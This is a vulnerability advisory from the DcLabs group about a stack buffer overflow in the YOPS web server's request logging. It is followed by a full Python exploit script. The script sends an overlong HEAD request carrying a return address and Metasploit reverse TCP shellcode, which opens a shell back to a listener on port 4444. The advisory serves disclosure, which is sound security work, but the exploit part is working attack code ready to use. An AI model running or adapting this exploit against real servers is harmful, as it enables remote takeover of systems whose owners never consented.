YOPS Remote Command Execution

`[DCA-00015]  
  
[Software]  
  
- YOPS (Your Open Personal [WEB] Server)  
  
[Vendor Product Description]  
  
- YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP  
server for Linux OS written in C. There are 7 stages (accept, parse,  
launch, fetch, error, send and log), and pipes are used as interstage  
channels.  
  
[Bug Description]  
  
- In function http_parse_request_header the application fails to do a  
boundary check for a malformed buffer received as a HTTP command  
(HEAD/GET/POST), prior to use it as input for logger variable at  
swebs_record_log function.  
  
--- http.c snippet ---  
int http_parse_request_header(char *data, struct http_request_header *h)  
{  
int r;  
int ver, rev;  
char *s, *tok, *l, *prm;  
[...]  
r = sscanf(h->http, " HTTP/%d.%d ", &ver, &rev);  
if (r != 2)  
return -400;  
[...]  
}  
--- END snippet ---  
  
--- swebs.c snippet ---  
int swebs_record_log(int log, JOB *job)  
{  
int err;  
time_t now;  
char timestr[32];  
char logrec[MAX_REQUEST_LINE_LEN + 1];  
[...]  
sprintf (  
logrec,  
"%s\t[%s]\t\"%s\"\t(%d+%d/%d)\t%d",  
job->client,  
timestr,  
job->hdr.request_line,  
job->response_hlen,  
job->response_blen_sent,  
job->response_blen,  
job->status  
);  
[...]  
}  
--- END snippet ---  
  
[History]  
  
- Advisory sent to vendor on 08/26/2010  
  
[Impact]  
  
- High (Remote Command Execution)  
  
[Affected Version]  
  
- YOPS 2009-11-30  
  
- Prior versions may also be vulnerable  
  
[Code]  
  
#!/usr/bin/python  
# Software:  
# YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP  
server for Linux OS written in C.  
# URL: http://sourceforge.net/projects/yops2009/  
#  
# Vulnerability: Rodrigo Escobar aka ipax @ DcLabs  
# Exploit: Flavio do Carmo Junior aka waKKu @ DcLabs  
# Contact: waKKu <AT> dclabs <DOT> com <DOT> br  
  
HOST = "localhost"  
PORT = 8888  
  
import socket  
import sys  
import time  
  
try:  
BUFF_LEN = int(sys.argv[1])  
except:  
BUFF_LEN = 802  
FIXUP_ADDR = "\x47\xce\x04\x08"  
  
shellcode = (  
# MetaSploit Reverse TCP Shell. Host: 127.0.0.1 - Port: 4444  
"\x33\xc9\xb1\x13\xbe\xae\x88\x55\xcb\xda\xcd\xd9\x74\x24\xf4"  
"\x5f\x31\x77\x0e\x03\x77\x0e\x83\x69\x8c\xb7\x3e\x44\x56\xc0"  
"\x22\xf5\x2b\x7c\xcf\xfb\x22\x63\xbf\x9d\xf9\xe4\x9b\x3f\x6a"  
"\x9a\x1b\xbf\x6b\x02\x74\xae\x37\xac\xd7\xba\xd7\x61\x88\xb3"  
"\x39\xc2\x42\xa5\xe1\x08\x12\x70\x95\x4a\xa3\xbd\x54\xec\x8d"  
"\xb8\x9f\xbd\x65\x15\x4f\x4d\x1e\x01\xa0\xd3\xb7\xbf\x37\xf0"  
"\x18\x6c\xc1\x16\x28\x99\x1c\x58\x43"  
)  
  
  
buffer = "HEAD "  
buffer += "A"*BUFF_LEN  
buffer += FIXUP_ADDR*4  
buffer += " HTTP/1.1"  
  
stackadjust = (  
"\xcb" # instruction alignment  
"\xbc\x69\x69\x96\xb0" # Stack Adjustment  
)  
  
payload = buffer + stackadjust + shellcode + "\r\n\r\n"  
  
print """  
######################################  
### DcLabs Security Research Group ###  
### +Exploit+ ###  
######################################  
Software: YOPS 2009 - Web Server  
---  
Vulnerability by: ipax  
Exploit by: waKKu  
Greetings to: All DcLabs members  
"""  
  
print " [+] Using BUFF_LEN -> ", str(BUFF_LEN)  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
print " [+] Trying to establish connection..."  
s.connect((HOST, PORT))  
print " [+] Sending a dummy request to initialize data..."  
s.send("HEAD DcLabs HTTP/1.1\r\n\r\n")  
try:  
s.recv(1024)  
except:  
pass  
s.close()  
  
time.sleep(3)  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((HOST, PORT))  
print " [+] Sending our malicious payload..."  
s.send(payload)  
print " [+] Payload sent, good luck!"  
s.close()  
  
  
--   
Rodrigo Escobar (ipax)  
Pentester/Researcher Security Team @ DcLabs  
http://www.dclabs.com.br  
`